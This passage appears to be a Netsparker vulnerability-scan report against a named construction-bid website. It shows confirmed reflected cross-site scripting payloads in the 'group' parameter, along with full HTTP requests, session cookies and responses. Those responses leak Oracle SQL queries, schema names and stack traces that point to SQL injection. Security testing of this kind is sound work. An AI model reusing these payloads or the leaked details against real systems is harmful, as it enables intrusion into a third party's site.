name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = '"--></style></script><script>netsparker(0x000140)</script> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x000140)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| group | GET | '"--></style></script><script>alert(0x00015E)</script> |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015E)%3C/script%3E&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:51 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:51 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10067
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00015E%29%3C%2Fscript%3E&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00015E%29%3C%2Fscript%3E&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00015E%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:52.428 [ 1] (TP-Processor1921) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = '"--></style></script><script>netsparker(0x00015E)</script> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x00015E)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:51 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:51 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10067
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00015E%29%3C%2Fscript%3E&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00015E%29%3C%2Fscript%3E&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00015E%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:52.428 [ 1] (TP-Processor1921) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = '"--></style></script><script>netsparker(0x00015E)</script> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x00015E)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| group | GET | '"--></style></script><script>alert(0x000176)</script> |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000176)%3C/script%3E&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:57 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:59 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10067
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000176%29%3C%2Fscript%3E&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000176%29%3C%2Fscript%3E&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000176%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:59.813 [ 1] (TP-Processor1654) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE 